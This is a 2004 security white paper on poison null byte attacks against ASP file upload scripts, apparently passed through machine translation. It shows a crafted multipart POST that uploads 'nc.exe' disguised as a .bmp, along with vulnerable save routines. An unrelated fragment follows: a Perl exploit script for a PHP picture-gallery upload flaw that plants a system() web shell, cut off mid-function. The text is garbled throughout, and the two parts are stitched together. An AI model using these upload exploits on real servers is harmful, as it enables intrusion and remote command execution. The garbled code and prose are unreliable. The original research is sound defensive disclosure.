Copyright Security-Assessment.com Ltd 2004White PaperTitle: 0x00 vs ASP file upload scriptsPrepared by: Brett MooreNetwork Intrusion SpecialistSecurity-Assessment.comDate: 13 July 200413/07/2004 Page 2 of 7Copyright Security-Assessment.com Ltd 2004AbstractThe affects of the `Poison Null byte`
have not been widely explored in ASP, butas with other languages the NULL byte can cause problems when ASP passesdata to objects.Many upload systems written in ASP suffer from a common problem whereby aNULL byte can be inserted into the filename parameter leading to any extension, after the null byte, being ignored when writing the file.This means that in some cases it is possible to bypass checks for validextensions, even if one is appended by the application.This is very similar to attacks against perl and PHP, the difference being how thenull byte is sent to the application.This problem arises when data is compared and validated in ASP script butpassed to the FileSystemObject without checking for NULL bytes.This document will discuss how ASP upload scripts can be affected by the PoisonNULL byte attack.ScopeThe information In this document is based on research done Uploadsystems That Incorporate Multipart / Form-Data Posts and thesecripting.FileSystemObject Object.throughout this d ocument we focus on the CreateTextFile method, which is usedto create a file for writing, but it is possible that other objects functions arevulnerable to the same type of problem.A% 00 or NULL can not be sent through the URL or a normal form post as theweb server registers this as the end of the string, but does not store it in thefilename variable.When a filename is sent using a multipart / form-data post the null byte will beincluded in the filename variable, thus affecting calls to the FileSystemObject .File Uploadingfile Uploading IS Commonly Done Using An Input Object of Type File And Anencoding Type of Multipart / Form-Data.The Content Type "Application / X-www-form-urlencoded"
is inefficient for sendinglarge quantities of binary data or text containing non-ASCII characters. The13 / 07/2004 Page 3 of 7Copyright Security-Assessment.com Ltd 2004content type "multipart / form-data" should be used for submitting forms thatcontain files, non -ASCII data, and binary data.A "multipart / form-data" message contains a series of parts, each representing asuccessful control. The parts are sent to the processing agent in the same orderthe corresponding controls appear in the document stream.When submitted the forms data will be sent in the multipart / form-data format. Thisallows for the transfer of all bytes, including nulls, within the forms posted data.Upon receiving the post, the target ASP page needs to process and decode theposted data into a Useable stat.
File SavingAt some point in the uploading process, the file will be saved to a file location. Thefollowing is some commonly used code to do this.Public Sub Save (filename) Dim objFSO, objFSOFilepath = server.MapPath ( "/ uploads /") Set objfso = server.createObject ("scripting.filesystemObject") set objfsofile = objfso.createtextfile (Path "/" filename) Objfsofile.write
Objfsofile.close
End Sub
When a filename parameter is passed to the createtextfile () Function, IT MAY
Contain null bytes. this can affect the name of the create port as the
CreateTextFile Only Reads Up to the Null Byte When Creating The File.
Set objfsofile = objfso.createtextfile (Path "/" filename)
If FileName Contains a null byte, Anything After That Byte Will BE IGNORED.
Null ByteThe NULL byte can be inserted manually through modifications to the multipartpost data using a hex editor, or by using a web proxy.Multipart Form PostPOST /upload.asp HTTP / 1.0Content-Type: multipart / form-data; boundary = - ------------------------- 7D4CB161B009CHOST: LOCALHOSTCONTENTENTH: 359PRAGMA: NO-Cachecookie: AspsessionIDSaadrcrs = laknnakagmibjcoolbifeik ------------------------------ ------------------- 7D4CB161B009cContent-disposition: form-data; name = "Yourfile"; filename = "c: /nc.exe .bmp" Content-Type: Text / PlainProof of Upload Test filebrett.moore@security-asureness--------------------------7d4cb161b009ccontent-disposition: Form-Data Name = "submit" Upload ---------------------------- 7D4CB161B009CTHE FILENAME PARAMETER OF THE ABOVE POST HAS BEEN CHANGED As Su . EXE (null). BM P4E 43 2E 45 58 45 00 2E 42 4D 50Note that an actual nULL byte (0x00) has been inserted between the .exe and the.bmp.Script TestsThe following two file save scripts shown below are examples of Upload SCR IPTSwhere The Extension of The Written File Can Be Arbitrarily Set.in Both Cases Tfile Is The FileName Parameter Passed THROUGH THE POST.
Example One (File Extension Appending) Public Sub Save (Path) Dim objFSO, objFSOFileDim lngLoopSet objFSO = Server.CreateObject ( "Scripting.FileSystemObject") Set objFSOFile = objFSO.CreateTextFile (objFSO.BuildPath (Path, tFile ".bmp") ) 'Write the file contentsFor lngLoop = 1 to LenB (m_Blob) objFSOFile.Write Chr (AscB (MidB (m_Blob, lngLoop, 1))) NextobjFSOFile.CloseEnd SubExample Two (File Extension Checking) Public Sub Save (Path) Dim objFSO, objFSOFileDim lngLoop 'Check the file extensionif right (tFile, 4) <> ".bmp" then exit subSet objFSO = Server.CreateObject ( "Scripting.FileSystemObject") Set objFSOFile = objFSO.CreateTextFile (objFSO.BuildPath (Path, tFile)) 'Write the file contentsFor lngLoop = 1 to LenB (m_Blob) objFSOFile.Write Chr (AscB (MidB (m_Blob, lngLoop, 1))) NextobjFSOFile.CloseEnd Sub13 / 07/2004 Page 6 of 7Copyright Security-Assessment.com Ltd 2004Final SummaryIt HAS Commonly Been Thought Web Applications Written in Asp Area Safe Fromthe Problems Associated with Null Bytes. While In Mo st instances this is true, itcan be seen here that applications that make use of objects external to the nativeASP scripting language, can be affected by NULL bytes.It is probable that other objects and areas can also be manipulated to some extentwhen their data is collected through a multipart / form-data post.As in other areas, proper validation of user input is paramount to the security ofweb applications. It is therefore important to check input not only for commonattack strings used for folder traversal, but also for NULL bytes before Using Theinput in The Creation of Files.
Referencesperl CGI Problems - Rain.Forest.puppyhttp: //www.phrack.p = 55 & a = 7bugtraq post regarding php and null byteshttp: //seclists.org/lists/bugtraq/2003/jan/0159. htmlOWASP HTML Versionhttp: //www.cgisecurity.com/owasp/html/guide.html#id2846281Forms in HTML documentshttp: //www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4Security -Assessment.comwww.security-Asessment.com
When the PHP program has specified PATH, the back door to the PATH file can be uploaded to any file.
Test procedure: NeatPic PHP directory direct reading 1.2.3
http://web.cncode.com/softview.asp?softid=1820
A vulnerability utilization program:! / Usr / bin / perl $ | = 1; Use socket; $ host = "127.0.0.1"; $ port = "80"; $ uploadto = ""; $ str = "---- ------------------------ 7D41F4A600472 / R / N "." Content-Disposition: Form-Data; Name = / "PATH /" / R /N "ww.ppp /r/n "ww.ppp /r/n"."-------------------------- --- 7d41f4a600472 / r / n "." Content-disposition: form-data; name = / "image /"; filename = / "f: //tools//1.gif/" / r / n "." Content-type: text / plain / r / n "." / R / n "." "System ($ c); / r / n". "?> / R / n "---------------------------- 7D41F4A600472 - / r / n". "/ R / n"; Print $ Str; $ LEN = Length ($ STR); Print $ LEN; $ REQ = "Post / 1/1/3721/index.php?action=upload http / 1.1 / r / n". "Accept: Image / GIF, Image / x-xbitmap, image / jpeg, image / pjpeg, application / msword, application / x-shockwave-flash, * / * / r / n "." Referr: http://127.0.0.1/index.php? Path =. / r / n "." accept-language: zh-cn / r / n "." Content-type: multipart / form-data; boundary = -------------- ------------ 7D41F4A600472 / R / N "." Accept-encoding: gzip, deflate / r / n "." User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT) 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) / r / n "." Host: 127.0.0.1/r/n "" in ",", "," Connection: Keep-alive / R / N ". "Cache-control: no-cache / r / n". "Cookie: phpsessid = 11111111111111111111111111111111111111111/ r / n". "$ STR / R / N / R / N"; Print $ Req; @res = sendraw ($ reg); print @res; #hmm ... Maybe you can send it by other way subsendraw {my ($ reg) = @_; my $ target; $ target = inet_aton ($ host) || DIE ("